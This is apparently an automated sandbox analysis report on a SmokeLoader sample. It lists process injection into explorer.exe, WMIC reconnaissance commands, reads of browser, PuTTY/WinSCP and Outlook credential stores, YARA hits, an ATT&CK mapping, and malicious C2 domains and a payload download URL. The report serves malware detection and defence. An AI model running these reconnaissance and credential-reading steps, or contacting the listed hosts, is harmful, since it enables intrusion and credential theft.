Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: FF79C0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: FF79C0	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Code function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe		17_2_00A310A5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe		17_2_00A31016

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Process created: C:\Windows\System32\cmd.exe cmd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv

Source: explorer.exe, 00000001.00000000.1724415447.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1722816666.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1726201886.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1722816666.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1722570425.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1722816666.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1722816666.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 13_2_00E555EB cpuid

13_2_00E555EB

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe

Code function: 10_2_00007FF6AAB49224 GetSystemTimeAsFileTime,WaitForSingleObject,GetSystemTimeAsFileTime,TerminateProcess,WaitForSingleObject,GetExitCodeProcess,

10_2_00007FF6AAB49224

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 13_2_00E02198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,

13_2_00E02198

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh firewall show state

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh firewall show state

Source: BC8F.exe, 0000000A.00000002.4140670526.0000020326C49000.00000004.00000020.00020000.00000000.sdmp, BC8F.exe, 0000000A.00000003.3011703244.0000020326C1D000.00000004.00000020.00020000.00000000.sdmp, BC8F.exe, 0000000A.00000003.3011303958.0000020326C36000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000010.00000002.4137644244.0000000000111000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 6112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 412, type: MEMORYSTR
Source: Yara match	File source: 9.3.uievsid.630000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.38E5.exe.610e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.3.uievsid.630000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.38E5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.uievsid.5d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.uievsid.5d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.uievsid.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.38E5.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.uievsid.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2487345753.0000000000761000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1737221336.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3707478995.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2436031389.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2753825516.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1737075127.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1970636946.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2699654261.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2487198589.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1970849868.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2754187003.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3707296343.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3713654761.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000010.00000002.4137644244.0000000000111000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 6112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 412, type: MEMORYSTR
Source: Yara match	File source: 9.3.uievsid.630000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.38E5.exe.610e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.3.uievsid.630000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.38E5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.uievsid.5d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.uievsid.5d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.uievsid.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.38E5.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.uievsid.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2487345753.0000000000761000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1737221336.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3707478995.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2436031389.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2753825516.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1737075127.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1970636946.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2699654261.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2487198589.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1970849868.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2754187003.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3707296343.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3713654761.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	12 Native API	Boot or Logon Initialization Scripts	522 Process Injection	1 Deobfuscate/Decode Files or Information	11 Input Capture	3 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	1 Credentials in Registry	249 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	12 Command and Scripting Interpreter	Login Hook	Login Hook	12 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	11 Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	871 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	34 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	34 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	522 Process Injection	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
veEGy9FijY.exe	34%	ReversingLabs
veEGy9FijY.exe	38%	Virustotal		Browse
veEGy9FijY.exe	100%	Avira	HEUR/AGEN.1310247
veEGy9FijY.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\haevsid	100%	Avira	HEUR/AGEN.1310247
C:\Users\user\AppData\Roaming\uievsid	100%	Avira	HEUR/AGEN.1311799
C:\Users\user\AppData\Local\Temp\38E5.exe	100%	Avira	HEUR/AGEN.1311799
C:\Users\user\AppData\Roaming\haevsid	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\uievsid	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\BC8F.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\38E5.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\BC8F.exe	37%	ReversingLabs	Win64.Trojan.Generic
C:\Users\user\AppData\Roaming\haevsid	34%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
calvinandhalls.com	5%	Virustotal	Browse
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
nwgrus.ru	12%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe
https://aka.ms/odirmr	0%	Virustotal		Browse
https://calvinandhalls.com/	0%	Virustotal		Browse
https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0	0%	Virustotal		Browse
https://23.145.40.164/ksa9104.exe	0%	Virustotal		Browse
https://calvinandhalls.com/search.phpMozilla/5.0	0%	Virustotal		Browse
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	0%	Virustotal		Browse
https://calvinandhalls.com/search.php	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	0%	Virustotal		Browse
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	0%	Virustotal		Browse
https://api.msn.com/q	0%	Virustotal		Browse
http://www.autoitscript.com/autoit3/J	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	0%	Virustotal		Browse
https://wns.windows.com/L	0%	Virustotal		Browse
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	0%	Virustotal		Browse
https://aka.ms/Vh5j3k	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	0%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	0%	Virustotal		Browse
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	0%	Virustotal		Browse
https://api.msn.com/v1/news/Feed/Windows?&	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	0%	Virustotal		Browse
https://calvinandhalls.com/s	4%	Virustotal		Browse
https://www.rd.com/list/polite-habits-campers-dislike/	0%	Virustotal		Browse
https://bestworldhools.com/search.php	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
calvinandhalls.com	23.145.40.162	true	true	5%, Virustotal, Browse	unknown
bg.microsoft.map.fastly.net	199.232.210.172	true	false	0%, Virustotal, Browse	unknown
nwgrus.ru	58.151.148.90	true	true	12%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://23.145.40.164/ksa9104.exe	true	0%, Virustotal, Browse	unknown
https://calvinandhalls.com/search.php	true	0%, Virustotal, Browse	unknown
https://bestworldhools.com/search.php	true	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://calvinandhalls.com/	explorer.exe, 0000000D.00000002.2910898340.0000000003578000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2910898340.000000000358E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2910898340.0000000003500000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1724600105.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://duckduckgo.com/chrome_newtab	explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.dr	false	URL Reputation: safe	unknown
http://schemas.mi	explorer.exe, 00000001.00000000.1726201886.000000000982D000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0	explorer.exe, 0000000D.00000002.2910898340.0000000003578000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
https://duckduckgo.com/ac/?q=	explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.dr	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://calvinandhalls.com/search.phpMozilla/5.0	explorer.exe, 0000000D.00000002.2910898340.0000000003500000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2875600167.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4140857927.00000000034A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4139493088.0000000000498000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4140362492.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4139073414.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comcember	explorer.exe, 00000001.00000000.1728229982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1726201886.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.dr	false	URL Reputation: safe	unknown
https://excel.office.com	explorer.exe, 00000001.00000000.1728229982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000001.00000000.1726891163.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1725351685.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1725731451.0000000008720000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
